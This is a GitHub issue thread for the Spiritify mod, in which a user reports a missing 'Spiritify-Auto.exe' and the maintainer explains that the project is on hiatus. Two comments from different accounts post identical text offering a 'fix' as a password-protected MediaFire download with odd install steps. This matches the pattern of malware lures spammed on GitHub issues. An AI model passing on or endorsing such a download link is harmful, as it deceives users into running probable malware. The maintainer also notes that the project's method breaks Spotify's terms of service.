### ISSUE TITLE
Missing "Spiritify-Auto.exe" in the Files Section

### ISSUE THREAD

**Issue by NEOHRI** [SpiritLauncher/Spiritify#1]
Hello,

I was attempting to install the mod, but I couldn't find the "Spiritify-Auto.exe" file in any of the files listed in the Files section. Could you please check if it's missing or if I'm looking in the wrong place?

Thank you!

![Screenshot_11](https://github.com/user-attachments/assets/15dee933-5a40-41be-8b12-e72b679295c7)
![imagen_2024-08-27_000415631](https://github.com/user-attachments/assets/372aec2f-5e57-447b-b1de-d897ea115091)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by L3m0n-Cao** [comment]
https://github.com/SpiritLauncher/Spiritify?tab=readme-ov-file#spirit-city-made-an-update-that-caused-the-variables-in-spiritify--spiritlauncher-to-stop-working-i-will-fix-this-when-i-have-time
 
"Spirit City made an update that caused the variables in Spiritify & SpiritLauncher to stop working. I will fix this when I have time."

I haven't gotten time to re-de-compile the exe so both projects are on hiatus for when I come back to it.

I plan to send the source code to the Devs but I would try and find a better method as the method I'm doing breaks Spotify's TOS.

**Comment by NEOHRI** [comment]
hank you for your response and for all the hard work you've put into this project. I really appreciate the effort you’ve made, and I understand that these things take time. I’ll keep an eye out for any updates in the future. Thanks again for everything!

Best regards. <3
